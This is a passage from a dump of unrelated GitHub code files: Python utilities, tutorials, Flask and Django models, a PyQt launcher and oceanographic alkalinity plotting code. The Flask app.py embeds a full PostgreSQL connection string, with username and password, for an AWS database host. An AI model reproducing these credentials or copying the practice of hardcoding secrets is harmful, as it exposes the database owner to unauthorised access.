\"Found existing `project.json` file. Not writing default config.\"\n )\n\n project = Project(project_dir, create_config_file=True)\n logger.info(\n \"Wrote default populus configuration to `./{0}`.\".format(\n os.path.relpath(project.config_file_path),\n )\n )\n\n for source_dir in project.contracts_source_dirs:\n if ensure_path_exists(source_dir):\n logger.info(\n \"Created Directory: ./{0}\".format(\n os.path.relpath(source_dir)\n )\n )\n\n example_contract_path = os.path.join(project.contracts_source_dirs[0], 'Greeter.sol')\n if not os.path.exists(example_contract_path):\n shutil.copy(GREETER_SOURCE_PATH, example_contract_path)\n logger.info(\"Created Example Contract: ./{0}\".format(\n os.path.relpath(example_contract_path)\n ))\n\n tests_dir = os.path.join(project.project_dir, 'tests')\n if ensure_path_exists(tests_dir):\n logger.info(\"Created Directory: ./{0}\".format(os.path.relpath(tests_dir)))\n\n example_tests_path = os.path.join(tests_dir, 'test_greeter.py')\n if not os.path.exists(example_tests_path):\n shutil.copy(GREETER_TEST_PATH, example_tests_path)\n logger.info(\"Created Example Tests: ./{0}\".format(\n os.path.relpath(example_tests_path)\n ))\n\n return project\n","repo_name":"veox/populllus","sub_path":"populus/api/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16995593840","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread('kingfisher.jpg', cv2.IMREAD_COLOR)\n\n# Draw a line on the image\ncv2.line(img, (10,10), (600, 700), (255,255,255), 10)\n\n# Draw a rectangel on the image\n\ncv2.rectangle(img, (10, 15), (250, 300), (155, 100, 10), 5)\n\n# Draw a circle\n\ncv2.circle(img, (225, 335), 100,(0,100, 25) , -1 )\n\n# Draw a polygon\n\npts = np.array([[10, 10], [25, 30], [50, 65], [70, 80], [80, 10]], np.int32)\ncv2.polylines(img, [pts], True, (200,15,100))\n\n# Write a text in the image\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(img, 'Kingfisher image', (1,100), font, 1, (201, 222, 100), 2, cv2.LINE_AA)\n\n# plotting from cv2\n\ncv2.imshow('image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","repo_name":"Nirkan/Computer-Vision-Python","sub_path":"OpenCV-Tutorials/opcv3.py","file_name":"opcv3.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"75354972691","text":"import os\nfrom pdb import set_trace\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import render_template\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import Table, Column, Integer, ForeignKey\nimport pdb\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgres://imperial:imperial-fdt-online-2019-colossal-shelf@imperial-2021.ckp3dl3vzxoh.eu-west-2.rds.amazonaws.com:5432/dvdrental\"\ndb = SQLAlchemy(app)\n\n\n\nclass Inventory(db.Model):\n film_id = db.Column(db.Integer(), primary_key=True)\n inventory_id = db.Column(db.Integer(), ForeignKey('film.film_id'))\n store_id = db.Column(db.Integer())\n\n def __repr__(self):\n return 'Inventory ID: '+str(self.inventory_id)\n\nclass Film(db.Model):\n __tablename__ = 'film'\n film_id = db.Column(db.Integer, primary_key=True)\n\n title = db.Column(db.String(255), index=True, unique=True)\n description = db.Column(db.String())\n\n copies = relationship('Inventory')\n\n\n def __repr__(self):\n return 'FILM: title is ' + self.title\n\n\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return \"Hello, World?\"\n\n\n\n\n\n@app.route('/films')\ndef films():\n films = Film.query.all()\n\n # print(films[0].description)\n\n return render_template('films.html', films = films)\n\n\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n\n","repo_name":"PrashantLonikar/assignment5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33970922302","text":"def json_prep(items):\n \"\"\"Convert a model-type object into a JSON-serializable object.\n\n Keyword Arguments:\n items -- the model-type object to be converted.\n \"\"\"\n\n # If the object is a list, convert it to a list of dictionaries.\n if isinstance(items, type([])):\n prepped = []\n for item in items:\n prepped_item = {\n 'id': item.id,\n 'name': item.name,\n 'sport': item.sport,\n 'category': item.category,\n 'description': item.description,\n 'date': item.date,\n 'user': item.user.username\n }\n prepped.append(prepped_item)\n return {'items': prepped}\n\n # If the object is not a list, convert it to a dictionary.\n else:\n prepped = {\n 'id': items.id,\n 'name': items.name,\n 'sport': items.sport,\n 'category': items.category,\n 'description': items.description,\n 'date': items.date,\n 'user': items.user.username\n }\n return {'item': prepped}\n","repo_name":"davidhammaker/Item_Catalog","sub_path":"item_catalog/jsons/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5774877610","text":"from django.db import models\nfrom edc_base.model_mixins import BaseUuidModel\nfrom edc_base.sites.site_model_mixin import SiteModelMixin\n\nfrom .contracting import Contracting\n\n\nclass JobPerformanceKpa(BaseUuidModel, SiteModelMixin, models.Model):\n\n contracting = models.ForeignKey(\n Contracting,\n on_delete=models.PROTECT)\n\n key_performance_area = models.CharField(\n verbose_name='KEY PERFORMANCE AREAS',\n max_length=100)\n\n kpa_tasks = models.TextField(\n verbose_name='TASKS',\n max_length=1000)\n\n kpa_performance_indicators = models.TextField(\n verbose_name='PERFORMANCE INDICATORS'\n '(completion dates)',\n max_length=1000)\n\n skills_required = models.TextField(\n verbose_name=\"SKILLS REQUIRED\",\n max_length=100)\n\n class Meta:\n verbose_name = 'Job Performance KPA'\n verbose_name_plural = 'Job Performance KPA'\n","repo_name":"Botswana-Harvard-Utility-Systems/bhp-personnel","sub_path":"bhp_personnel/models/job_performance_kpa.py","file_name":"job_performance_kpa.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5124537764","text":"from sqlalchemy import case\nfrom flaskapp.models import Restaurant, MenuItem, Courses\nfrom flaskapp import db\n\n\nclass DBAccess:\n @staticmethod\n def getRestaurant(restaurantId: int) -> Restaurant:\n return db.session.query(Restaurant) \\\n .filter_by(id=restaurantId).first()\n\n @staticmethod\n def getMenuItem(menuId: int) -> MenuItem:\n return db.session.query(MenuItem).filter_by(id=menuId).first()\n\n @staticmethod\n def getRestaurants():\n return db.session.query(Restaurant).order_by(Restaurant.name)\n \n @staticmethod\n def getCourses(restaurantId: int):\n sort_order = case(value=MenuItem.course, whens=Courses)\n return db.session.query(MenuItem.course).distinct().filter_by(\n restaurant_id=restaurantId).order_by(sort_order)\n\n @staticmethod\n def getMenuItems(restaurantId: int):\n return db.session.query(MenuItem).filter_by(\n restaurant_id=restaurantId)\n\n @staticmethod\n def getMenuItemsByCourse(restaurantId: int):\n return [(course[0], db.session.query(MenuItem).filter_by(\n restaurant_id=restaurantId,\n course=course[0]))\n for course\n in DBAccess.getCourses(restaurantId)]\n\n @staticmethod\n def createNewRestaurant(name: str):\n new_restaurant = Restaurant(\n name=name)\n db.session.add(new_restaurant)\n db.session.commit()\n\n @staticmethod\n def createNewMenuItem(restaurantId: int,\n name: str,\n price: str,\n description: str,\n course: str):\n new_menu_item = MenuItem(\n name=name,\n price=price,\n description=description,\n restaurant_id=restaurantId,\n course=course,\n )\n db.session.add(new_menu_item)\n db.session.commit()\n\n @staticmethod\n def renameRestaurant(restaurantId: int, name: str):\n restaurant = DBAccess.getRestaurant(restaurantId)\n restaurant.name = name\n db.session.commit()\n\n @staticmethod\n def editMenuItem(menuId: int,\n name: str,\n price: str,\n description: str,\n course: str):\n menu_item = DBAccess.getMenuItem(menuId=menuId)\n menu_item.name = name\n menu_item.price = price\n menu_item.description = description\n menu_item.course = course\n db.session.commit()\n\n @staticmethod\n def deleteRestaurant(restaurantId: int):\n db.session.delete(DBAccess.getRestaurant(restaurantId))\n db.session.commit()\n\n @staticmethod\n def deleteMenuItem(menuId: int):\n db.session.delete(DBAccess.getMenuItem(menuId=menuId))\n db.session.commit()\n","repo_name":"hgihem/FlaskTutorial","sub_path":"flaskapp/database_access.py","file_name":"database_access.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6496892371","text":"'''Comprehension'''\n# синтаксический сахар - упращение кода\n\n# генерация последовательности в одну строку используя цикл (синтаксический сахар)\n\n# list, set, dict\n'''Синтаксис'''\n# result for element in iterable_object\n# result for element in iterable_object if filter \n\n'''====== LIst comprehension ======'''\n''' Упрощенный подход к созданию списка, задействует цикл for и if-else. Работает быстрее чем обычный'''\n# \n\n''' for '''\n# list_=[]\n# for i in range(11):\n# list_.append(i)\n# print(list_)\n\n# a=list((i for i in range(11)))\n# print(a)\n\n# list_=[i for i in range(11)]\n# print(list_)\n# '''#\n'''засекаем время'''\n# import time\n# start_time= time.time()\n\n# list_=[]\n# for i in range(100000):\n# list_.append(i)\n# time1= time.time()- start_time\n\n# start_time = time.time()\n# list_2=[i for i in range(11)]\n# time2= time.time()- start_time\n# print( time1, time2)\n\n''' if '''\n# \n# list_=[]\n# for i in range(11):\n# if i%2==0:\n# list_.append(i)\n# print(list_)\n\n# list_2=[i for i in range(11) if i%2==0]\n# print(list_2)\n# \n\n# list_2=[i for i in range(0,11,2)]\n# print(list_2)\n\n# list_2=[i for i in range(11) if not i%2]\n# print(list_2)\n\n\n# a=['hello'for i in range(10)]\n# print(a) #['hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello']\n\n# print([input() for i in range(2)]) на каждой итерации запрашивает ввод(input)\n\n''' if- else . Если в условии нужен else, то все условие пишется перед for'''\n# list_2=[i if not i%2 else 'hello' for i in range(11) ]\n# print(list_2) #[0, 'hello', 2, 'hello', 4, 'hello', 6, 'hello', 8, 'hello', 10]\n'''задача '''\n# list_1 =[1,'hello', 3, 'a', 4.0, 6, 8, 'hw']\n# l=['четное' if i%2==0 else 'нечетное' for i in list_1 if type(i)==int or type(i)== float]\n# print(l) #['нечетное', 'нечетное', 'четное', 'четное', 'четное']\n\n\n\n''' set comprehension'''\n# почти тоже самое как и представление списков(list comprehension)\n# Используются {} скобки, не содержит дубликатов, не гарнтирует сохранность элементов в порядке\n\n# list_=[1,2,3,4,5,4,5,3,2]\n# set_={i for i in list_}\n# print(set_) #{1, 2, 3, 4, 5}\n\n# set_= set()\n# for i in list_:\n# set_.add(i)\n# print(set_)\n\n''' dict comprehension'''\n# необходимо дополнительно определить ключ\n\n# dict_={i: i for i in range(10)}\n# print(dict_) #{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9}\n\n# dic={}\n# for i in range(10):\n# dic.update({i: i**2})\n# print(dic) #{0: 0, 1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36, 7: 49, 8: 64, 9: 81}\n\n# l=[1,1,2,3,2,2,3,4,5]\n# li={i: l.count(i) for i in l}\n# print(li) #{1: 2, 2: 3, 3: 2, 4: 1, 5: 1}\n\n# d={'a':2, 'b':3}\n# l={k: 'четное' if v%2==0 else 'нечетное' for k,v in d.items() }\n# print(l) #{'a': 'четное', 'b': 'нечетное'}\n'''создать словарь, где ключи- это числа от 1 до 10, а значения эти же числа в виде строки'''\n# d={i: str(i) for i in range(1,11)}\n# print(d)\n\n''''''\n# l1=[1,2,3,4,5]\n# l2=['a','b','c','d','e']\n# d={ l1[i]: l2[i] for i in range(len(l1))}\n# print(d) #{1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e'}\n\n\n''' вложенные comprehension'''\n# d={i: list(range(1,i+1)) for i in range(1,6)}\n# print(d)\n\n# d={i: [j for j in range(1,i+1)] for i in range(1,6)} # вложенность\n# print(d)\n\n''''''\n# l=[['hello world' for i in range(5)] for j in range(10)]\n# print(l)\n\nemployees = {\n 'id1': {\n 'first name': 'Александр',\n 'last name' : 'Иванов',\n 'age': 30,\n 'job':'программист'\n },\n 'id2': {\n 'first name': 'Ольга',\n 'last name' : 'Петрова',\n 'age': 35,\n 'job':'ML-engineer'\n }}\n# for info in employees.values():\n# for k,v in info.items():\n# if k=='age':\n# info[k] = float(v)\n# print(employees)\n\n# print({id_: {k: float(v) if k=='age' else v for k,v in info.items()} for id_, info in employees.items()})\n# # info == {k: float(v) if k=='age' else v for k,v in info.items()}","repo_name":"clara8luna/lessons_py_27_ev","sub_path":"comprehensions.py","file_name":"comprehensions.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28848963243","text":"class Solution:\n def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:\n \n if not timeSeries: return 0\n \n poisoned_time = 0\n for i in range(len(timeSeries)-1):\n poisoned_time += min(duration, timeSeries[i+1] - timeSeries[i])\n \n return poisoned_time + duration\n","repo_name":"shoaibur/Software-Engineering","sub_path":"Leetcoding-Actions/Explore-Monthly-Challenges/2020-09/26-Teemo-Attacking.py","file_name":"26-Teemo-Attacking.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"31482701896","text":"from django.contrib.sites.shortcuts import get_current_site\n\n\nclass SiteFilteredViewMixin(object):\n\n site_field = 'site'\n\n def get_queryset(self):\n qs = super(SiteFilteredViewMixin, self).get_queryset()\n kwargs = {\n self.site_field: get_current_site(self.request),\n }\n return qs.filter(**kwargs)\n","repo_name":"fdemmer/airavata","sub_path":"airavata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72764200210","text":"from PyQt5 import QtWidgets, uic, QtCore\nimport sys, os, glob, json\n\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__() # Call the inherited classes __init__ method\n uic.loadUi('UiTOF.ui', self) # Load the .ui file\n self.searchB.clicked.connect(self.click_s)\n self.exeB.clicked.connect(self.exe)\n self.scrfold = (\"/home/mgiacalo/GitHub/\",\"/home/mgiacalo/alice/alidist/\")\n self.diction = {}\n paths, names = self.getFiles()\n dictL = {names[i]: paths[i] for i in range(len(paths))}\n self.setupDict(dictL)\n names.sort()\n self.fillCombo(names)\n\n self.show() # Show the GUI\n \n def fillCombo(self, fill):\n self.comboBox.addItems(fill) \n\n def click_s(self):\n index = self.comboBox.findText(self.lsearch.text(), QtCore.Qt.MatchFixedString|QtCore.Qt.MatchContains)\n if index != -1:\n self.comboBox.setCurrentIndex(index)\n else: \n self.lsearch.setText(\"Not FOUND\") \n\n def setupDict(self, Dict):\n self.diction = Dict\n\n def exe(self):\n print(self.diction[self.comboBox.currentText()]) \n\n def getFiles(self):\n paths = []\n names = []\n for fol in self.scrfold:\n os.chdir(fol)\n for file in glob.glob(\"*.sh\"):\n paths.append(fol + file)\n names.append(file) \n return paths, names \n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Ui()\napp.exec_() ","repo_name":"jackal1-66/UiTOF","sub_path":"UiTOF_V3.py","file_name":"UiTOF_V3.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34714430087","text":"import xarray as xr\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib as mpl\nimport seaborn as sns\nfrom datetime import datetime\nfrom pandas.plotting import register_matplotlib_converters\n\nsns.set()\nregister_matplotlib_converters()\n\n# sets up pandas table display\npd.set_option('display.width', 500)\npd.set_option('display.max_columns', 100)\npd.set_option('display.notebook_repr_html', True)\npd.options.mode.chained_assignment = None\nfont = {'family': 'normal',\n 'weight': 'bold',\n 'size': 22}\nLNW = 2\nFNTSZ = 14\nLGNDSZ = 14\nmpl.rcParams['xtick.labelsize'] = LGNDSZ\nmpl.rcParams['ytick.labelsize'] = LGNDSZ\nSTART = '2011-01-01'\nSTOP = '2011-12-31'\nX_TEXT = 0.97\nY_TEXT = 0.98\n\nALK_VAR = 'B_C_Alk'\nALKFLUX_VAR = 'B_C_Alk _flux'\n\n\ndef addseason(datestring):\n \"\"\"Classifies season\"\"\"\n\n item = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n if 2 < item.month < 6:\n return 'spring'\n elif 5 < item.month < 9:\n return 'summer'\n elif 8 < item.month < 12:\n return 'autumn'\n else:\n return 'winter'\n\n\ndef addmonth(datestring):\n \"\"\"Classifies month\"\"\"\n\n item = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n year = {1: 'january', 2: 'february', 3: 'march', 4: 'april',\n 5: 'may', 6: 'june', 7: 'july', 8: 'august', 9: 'september',\n 10: 'october', 11: 'november', 12: 'december'}\n return year[item.month]\n\n\ndef addseconds(datestring):\n t = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n return (t - datetime(2017, 1, 1)).total_seconds()\n\n\ndef addsecondstolvl(datestring):\n datestring = datestring[0:-4]\n t = datetime.strptime(datestring, \"%d/%m/%Y %H:%M:%S\")\n return (t - datetime(2017, 1, 1)).total_seconds()\n\n\ndef addband(longitude):\n if 6.95 < longitude < 7:\n return 1\n else:\n return 0\n\n\ndef addphase(seconds):\n period = (12 * 60 * 60) + (25.2 * 60)\n half_period = period / 2\n startphase = (half_period / 12) * 8\n modulus = (seconds - startphase) % period\n if modulus < half_period:\n return 'low'\n else:\n return 'high'\n\n\ndef addphase_2(slev):\n if slev > 0:\n return 'high'\n else:\n return 'low'\n\n\ndef commafix(string):\n return float(string.replace(',', '.'))\n\n\ndef calculateTA(method, t, s):\n if method == 'Bellerby':\n if s >= 34.65:\n return 66.96 * s - 36.803 # Bellerby & Canoba\n else:\n return 3887 - 46.25 * s # Borges & Frankignoulle & Canoba\n elif method == 'Millero':\n if t < 20:\n return (s / 35 * (2291 - 2.69 * (t - 20)\n - 0.046 * np.square(t - 20)))\n else:\n return 520.1 + 51.24 * s # Millero et al, MarChem, 1998\n\n\ndef treatlvl(sealvldata):\n sealvldata['Seconds_since_start_of_the_year'] \\\n = sealvldata.TIME.map(addsecondstolvl)\n try:\n sealvldata['SLEV'] = sealvldata.SLEV.map(commafix)\n except AttributeError:\n pass\n sealvldata = sealvldata[sealvldata.SLEV.values[:] != -999]\n sealvldata['Phase'] = sealvldata.SLEV.map(addphase_2)\n return sealvldata\n\n\ndef treatbiogeodata(biogeodata):\n \"\"\"Process the data\"\"\"\n biogeodata['Season'] = biogeodata.Datetime.map(addseason)\n biogeodata['Month'] = biogeodata.Datetime.map(addmonth)\n biogeodata['Seconds_since_start_of_the_year'] \\\n = biogeodata.Datetime.map(addseconds)\n biogeodata['TAfromS'] = [calculateTA('Millero', t, s)\n for t, s in zip(biogeodata.Temperature.values,\n biogeodata.Salinity.values)]\n return biogeodata\n\n\ndef addlvlphase(biogeodata, sealvldata):\n \"\"\"Biogeodata and sealvldata for the current month\"\"\"\n biogeodata['SLEV'] \\\n = [np.interp(x,\n sealvldata.Seconds_since_start_of_the_year.values,\n sealvldata.SLEV.values)\n for x in biogeodata.Seconds_since_start_of_the_year.values]\n biogeodata['Phase'] = biogeodata.SLEV.map(addphase_2)\n return biogeodata\n\n\ndef returndate(datestring):\n return datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n\n\ndef cm2inch(*tupl):\n inch = 2.54\n if isinstance(tupl[0], tuple):\n return tuple(i/inch for i in tupl[0])\n else:\n return tuple(i/inch for i in tupl)\n\n\ndef plotTA(biogeodata):\n fig, ax = plt.subplots(figsize=(12, 5), constrained_layout=True)\n Time = biogeodata.Datetime.map(returndate).values\n TA = biogeodata.TA.values\n TAfromS = biogeodata.TAfromS.values\n size = FNTSZ\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n ax.scatter(Time, TA, label='Total Alkalinity, measured', s=size)\n ax.scatter(Time, TAfromS,\n label='Total Alkalinity, calculated from salinity',\n s=size)\n for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +\n ax.get_xticklabels() + ax.get_yticklabels()):\n item.set_fontsize(FNTSZ)\n ax.legend(loc='upper left', fontsize=LGNDSZ)\n plt.ylabel('Total Alkalinity, $\\mu M$')\n plt.show()\n\n\ndef plot_intro():\n north7 = pd.read_csv(\"data/HafniaDataNorth7Shamil.csv\")\n north7 = treatbiogeodata(north7)\n plotTA(north7)\n\n\ndef get_data_time(dtsts):\n alk_year, alkflux_bottom_year = [], []\n\n for i, ds in enumerate((dtsts), start=0):\n alk_df = ds[ALK_VAR].to_dataframe()\n alkflux_df = ds[ALKFLUX_VAR].to_dataframe()\n alk = alk_df.groupby('z').get_group(0.625).reset_index('z', drop=True)\n alkflux_bottom = alkflux_df.groupby('z_faces').get_group(2.5)\n alkflux_bottom = alkflux_bottom.reset_index('z_faces', drop=True)\n\n alk_year.append(alk[START:STOP])\n alkflux_bottom_year.append(alkflux_bottom[START:STOP])\n alk_year[i] = alk_year[i].reset_index()\n alkflux_bottom_year[i] = alkflux_bottom_year[i].reset_index()\n alk_year[i][ALK_VAR] = alk_year[i][ALK_VAR]-alk_year[i][ALK_VAR].min()\n\n return alk_year, alkflux_bottom_year\n\n\ndef plot_alkalinity_flux_low_high():\n base_path = 'data/results'\n ds1 = xr.open_dataset('{}/2_po75-25_di1e-9/water.nc'.format(base_path))\n ds2 = xr.open_dataset('{}/3_po75-25_di2e-9/water.nc'.format(base_path))\n ds3 = xr.open_dataset('{}/4_po75-25_di5e-9/water.nc'.format(base_path))\n ds4 = xr.open_dataset('{}/5_po75-25_di10e-9/water.nc'.format(base_path))\n ds5 = xr.open_dataset('{}/6_po75-25_di15e-9/water.nc'.format(base_path))\n ds6 = xr.open_dataset('{}/7_po75-25_di20e-9/water.nc'.format(base_path))\n ds7 = xr.open_dataset('{}/8_po75-25_di25e-9/water.nc'.format(base_path))\n ds8 = xr.open_dataset('{}/9_po75-25_di30e-9/water.nc'.format(base_path))\n ds9 = xr.open_dataset('{}/10_po75-25_di35e-9/water.nc'.format(base_path))\n\n alk_year, alkflux_bottom_year = get_data_time([ds1, ds2, ds3, ds4, ds5,\n ds6, ds7, ds8, ds9])\n\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(2, 1, 1)\n ax1 = fig.add_subplot(2, 1, 2)\n\n labels = [r'$1e-9$', r'$2e-9$', r'$5e-9$', r'$10e-9$', r'$15e-9$',\n r'$20e-9$', r'$25e-9$', r'$30e-9$', r'$35e-9$']\n\n for n in range(0, 9):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n][ALKFLUX_VAR],\n linewidth=LNW, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n][ALK_VAR],\n linewidth=LNW, label=labels[n])\n\n ax.set_ylabel('TA fluxes, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax1.set_ylabel('Relative TA, mmol m$^{-3}$', fontsize=FNTSZ)\n ax.legend(loc='best', title='$kz_{dispersion}$, m$^2$ s$^{-1}$',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax, ax1)):\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\ndef plot_alkalinity_flux_sulfur_oxidation():\n\n ds0 = xr.open_dataset('data/different_sulfur_oxidation/high/water.nc')\n ds1 = xr.open_dataset('data/different_sulfur_oxidation/low/water.nc')\n ds2 = xr.open_dataset('data/different_sulfur_oxidation/regular/water.nc')\n\n alk_year, alkflux_bottom_year = get_data_time([ds0, ds1, ds2])\n\n fig = plt.figure(figsize=cm2inch(30, 10))\n ax = fig.add_subplot(1, 2, 1)\n ax1 = fig.add_subplot(1, 2, 2)\n\n labels = ['high', 'low', 'base']\n for n in range(0, 3):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n][ALKFLUX_VAR],\n linewidth=LNW, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n][ALK_VAR],\n linewidth=LNW, label=labels[n])\n\n ax.set_ylabel('mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax.set_title('TA fluxes', fontsize=FNTSZ)\n ax1.set_ylabel('mmol m$^{-3}$', fontsize=FNTSZ)\n ax1.set_title('Relative Total Alkalinity', fontsize=FNTSZ)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax, ax1)):\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n ax.legend(loc='upper left', title='Sulfur compounds \\noxidation rates',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n plt.show()\n\n\ndef plot_alkalinity_flux_porosities1_2_3():\n\n base_path = 'data/different_porosities'\n ds0 = xr.open_dataset('{}/4_po45-25_di10e-9/water.nc'.format(base_path))\n ds1 = xr.open_dataset('{}/0_po55-25_di10e-9/water.nc'.format(base_path))\n ds2 = xr.open_dataset('{}/1_po65-25_di10e-9/water.nc'.format(base_path))\n ds3 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds4 = xr.open_dataset('{}/3_po85-25_di10e-9/water.nc'.format(base_path))\n\n base_path = 'data/different_porosities_2'\n ds0_2 = xr.open_dataset('{}/0_po75-05_di10e-9/water.nc'.format(base_path))\n ds1_2 = xr.open_dataset('{}/1_po75-15_di10e-9/water.nc'.format(base_path))\n ds2_2 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds3_2 = xr.open_dataset('{}/3_po75-35_di10e-9/water.nc'.format(base_path))\n\n base_path = 'data/different_porosities_3'\n ds0_3 = xr.open_dataset('{}/0_po63-32_di10e-9/water.nc'.format(base_path))\n ds1_3 = xr.open_dataset('{}/1_po70-28_di10e-9/water.nc'.format(base_path))\n ds2_3 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds3_3 = xr.open_dataset('{}/3_po82-21_di10e-9/water.nc'.format(base_path))\n\n alk_year, alkflux_bottom_year = get_data_time([ds0, ds1, ds2, ds3, ds4])\n alk_year_2, alkflux_bottom_year_2 = get_data_time([ds0_2, ds1_2,\n ds2_2, ds3_2])\n alk_year_3, alkflux_bottom_year_3 = get_data_time([ds0_3, ds1_3,\n ds2_3, ds3_3])\n\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(3, 2, 1)\n ax1 = fig.add_subplot(3, 2, 2)\n ax_2 = fig.add_subplot(3, 2, 3)\n ax1_2 = fig.add_subplot(3, 2, 4)\n ax1_3 = fig.add_subplot(3, 2, 6)\n ax_3 = fig.add_subplot(3, 2, 5)\n\n labels = ('0.45-0.25', '0.55-0.25', '0.65-0.25', '0.75-0.25', '0.85-0.25')\n labels_2 = ('0.75-0.05', '0.75-0.15', '0.75-0.25', '0.75-0.35')\n labels_3 = ('0.63-0.32', '0.70-0.28', '0.75-0.25', '0.82-0.21')\n\n for n in range(0, 5):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n]['B_C_Alk _flux'],\n linewidth=LNW, alpha=1, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n]['B_C_Alk'],\n linewidth=LNW, label=labels[n])\n\n for n in range(0, 4):\n ax_2.plot(alkflux_bottom_year_2[n]['time'],\n alkflux_bottom_year_2[n]['B_C_Alk _flux'],\n linewidth=LNW, label=labels_2[n])\n ax1_2.plot(alk_year_2[n]['time'], alk_year_2[n]['B_C_Alk'],\n linewidth=LNW, label=labels_2[n])\n\n ax_3.plot(alkflux_bottom_year_3[n]['time'],\n alkflux_bottom_year_3[n]['B_C_Alk _flux'],\n linewidth=2, label=labels_3[n])\n ax1_3.plot(alk_year_3[n]['time'], alk_year_3[n]['B_C_Alk'],\n linewidth=LNW, label=labels_3[n])\n\n for axis in [ax, ax1, ax_2, ax1_2, ax_3, ax1_3]:\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n for axis in [ax, ax_2, ax_3]:\n axis.set_ylabel('mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n axis.set_ylim(0, 27)\n\n for axis in [ax1, ax1_2, ax1_3]:\n axis.set_ylabel('mmol m$^{-3}$', fontsize=FNTSZ)\n axis.legend(loc='upper left',\n title='Porosities:\\n SWI - \"infinite depth\"',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n axis.set_ylim(0, 180)\n ax.set_title('TA fluxes', fontsize=FNTSZ)\n ax1.set_title('Relative Total Alkalinity', fontsize=FNTSZ)\n\n labels = ('(A) ', '(B)', '(C) ', '(D)', '(E)', '(F)')\n for i, axis in enumerate((ax, ax1, ax_2, ax1_2, ax_3, ax1_3)):\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\ndef plot_alk_sulfur_fluxes():\n\n ds1 = xr.open_dataset('data/results/2_po75-25_di1e-9/water.nc')\n ds2 = 